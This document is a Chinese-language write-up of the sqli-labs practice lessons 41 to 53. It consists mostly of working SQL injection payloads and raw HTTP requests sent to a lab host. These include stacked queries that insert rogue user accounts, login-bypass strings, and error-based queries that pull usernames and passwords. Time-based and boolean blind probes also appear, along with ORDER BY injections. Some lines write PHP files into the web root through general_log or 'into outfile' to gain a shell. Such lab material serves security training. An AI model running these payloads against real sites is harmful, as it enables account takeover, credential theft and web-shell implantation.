sqlilab-Less-41-53-writeup

Less-41 堆叠查询注入 整数不回显

此关卡和Less-39是一样的，只是不能回显

?id=1;insert into users(username,password) values ('bmf9998','shit');

?id=1;set global general_log = "ON";set global general_log_file='/var/www/html/Less-41/shell.php';--+

Less-42 堆叠查询注入POST请求 显错

此关卡因为在输入密码处没有个过滤，可以通过万能密码，常规的报错，联合查询注入，同时也支持跟Less-24类似的二次注入，本关卡目的是考察POST请求的堆叠查询

报错注入

POST /Less-42/login.php HTTP/1.1
Host: 106.54.35.126
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://106.54.35.126/Less-42/index.php
Cookie: PHPSESSID=a914e467b5219eaf95dbb5db529e56ca
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 253

login_user=admin&login_password=bmfx ' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT(SELECT CONCAT(CAST(CONCAT(username,password) AS CHAR),0x7e)) FROM users LIMIT 0,1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a)#&mysubmit=Login

输入密码处万能密码登录
shit' or 998#

堆叠查询注入

POST /Less-42/login.php HTTP/1.1
Host: 106.54.35.126
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://106.54.35.126/Less-42/index.php
Cookie: PHPSESSID=a914e467b5219eaf95dbb5db529e56ca
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 121

login_user=admin&login_password=bmfx'; insert into users(username,password) values ('bmfd998998','shit');#&mysubmit=Login

其他几种我就不演示了，在输入密码处操作即可

Less-43 堆叠查询注入POST请求 显错 加括号

此关卡跟Less-42是一样的，也是输入密码处没有过滤，只是闭合方式加了括号

报错注入

POST /Less-43/login.php HTTP/1.1
Host: 106.54.35.126
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://106.54.35.126/Less-43/
Cookie: PHPSESSID=a914e467b5219eaf95dbb5db529e56ca
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 252

login_user=admin&login_password=bmfx') AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT(SELECT CONCAT(CAST(CONCAT(username,password) AS CHAR),0x7e)) FROM users LIMIT 0,1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a)#&mysubmit=Login

万能密码登录
shit') or 998#

堆叠查询注入

POST /Less-43/login.php HTTP/1.1
Host: 106.54.35.126
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://106.54.35.126/Less-43/
Cookie: PHPSESSID=a914e467b5219eaf95dbb5db529e56ca
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 121

login_user=admin&login_password=bmfx'); insert into users(username,password) values ('bmfd77878','shit');#&mysubmit=Login

Less-44 堆叠查询注入POST请求 盲注

此关卡跟Less-43是一样的，没有报错注入

堆叠查询注入

POST /Less-44/login.php HTTP/1.1
Host: 106.54.35.126
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://106.54.35.126/Less-44/
Cookie: PHPSESSID=a914e467b5219eaf95dbb5db529e56ca
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 119

login_user=admin&login_password=bmfx';insert into users(username,password) values ('bmfx44333','shit');#&mysubmit=Login

Less-45 堆叠查询注入POST请求 盲注 加括号

此关卡跟Less-43的闭合方式是一样的，没有报错注入

堆叠查询注入

POST /Less-45/login.php HTTP/1.1
Host: 106.54.35.126
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://106.54.35.126/Less-45/
Cookie: PHPSESSID=a914e467b5219eaf95dbb5db529e56ca
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 120

login_user=admin&login_password=bmfx'); insert into users(username,password) values ('bmfx0925','shit');#&mysubmit=Login

Less-46 Order by显错注入

验证方式

升序和降序
升序：?sort=1 asc 显示排序后的信息，显示正常
降序：?sort=1 dasc 显示异常报错

rand()验证

?sort=rand(true)
?sort=rand(false)
上述执行成功，true和false执行的结果是不一样的

或者
?sort=rand() 随机显示每次都不一样
?sort=1 and rand() 显示一次，之后每次都一样
利用上述的区别来判断验证

延时验证

?sort=sleep(1)
?sort=(sleep(1))
?sort=1 and sleep(1)
这个我测试的时候，容易把数据库卡死，原因可能是延时的时间为 (行数*1) 秒，写的是延时1秒实际如果数据库内容信息比较多的话，那么时间就会很长

报错注入

updatexml方式
?sort=1 and updatexml(1,concat(0x7e,(select database()),0x7e),1) %23

正常SQL查询
?sort=1+AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(CONCAT(username,password)+AS+CHAR),0x7e))+FROM+users+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)

procedure analyse方式
?sort=1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1)

布尔型盲注

?sort=rand(left(database(),1)>'r')
?sort=rand(left(database(),1)>'s')

时间延时盲注

?sort=rand(if(ascii(substr(database(),1,1))>114,1,sleep(1)))
?sort=rand(if(ascii(substr(database(),1,1))>115,1,sleep(1)))

into outfile 导入文件

?sort=1 into outfile "/var/www/html/Less-46/less46.txt"

通过导入文件getshell

?sort=1 into outfile "/var/www/html/Less-46/less46.php" lines terminated by 0x3c3f70687020706870696e666f28293b3f3e
上述的 3c3f70687020706870696e666f28293b3f3e是<php phpinfo();>的16进制

在线转换：https://www.bejson.com/convert/ox2str/

Less-47 Order by单引号显错注入 单引号

此关卡跟Less-46注入方式一样，只是增加了单引号

报错注入

updatexml方式
?sort=1' and updatexml(1,concat(0x7e,(select version()),0x7e),1) %23

正常查询注入
?sort=1'+AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(CONCAT(username,password)+AS+CHAR),0x7e))+FROM+users+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)--+

procedure analyse方式
?sort=1' procedure analyse(extractvalue(rand(),concat(0x3a,version())),1)--+

Less-48 Order by单引号显错注入 盲注

此关卡跟Less-46一样，只是本关卡是盲注，那么就不能使用报错注入

?sort=1 into outfile "/var/www/html/Less-48/less48.txt"

Less-49 Order by单引号显错注入 盲注

此关卡跟Less-46一样，不能使用报错注入

写文件
?sort=1' into outfile "/var/www/html/Less-49/less49.txt"

延时注入
?sort=' rand(if(ascii(substr(database(),1,1))=115,1,sleep(10)))

Less-50 Order by注入 整型

此关卡跟Less-46一样，同时将原来的查询mysql_query改成了mysqli_multi_query，所以支持堆叠注入，堆叠注入看下Less-38即可

?sort=1 and updatexml(1,concat(0x7e,(select database()),0x7e),1) %23

Less-51 Order by注入 单引号

此关卡跟Less-50一样，就是需要加单引号来闭合

?sort=1' and updatexml(1,concat(0x7e,(select database()),0x7e),1) %23

Less-52 Order by注入 盲注 整型

跟Less-50的情况一样，少了报错注入，可以使用布尔型和时间延时盲注

?sort=rand(if(ascii(substr(database(),1,1))>114,1,sleep(1)))
?sort=rand(if(ascii(substr(database(),1,1))>115,1,sleep(1)))

?sort=1 and if(length(database())=8,sleep(5),0) --+

Less-53 Order by注入 盲注 单引号

?sort=4' and if(length(database()) = 8 ,0,sleep(6)) --+
?sort=1' and (length(database())) = 8 and if(1=1, sleep(1), null) and '1'='1
?sort=1' and (ascii(substr((select database()) ,1,1))) = 114 and if(1=1, sleep(1), null) and '1'='1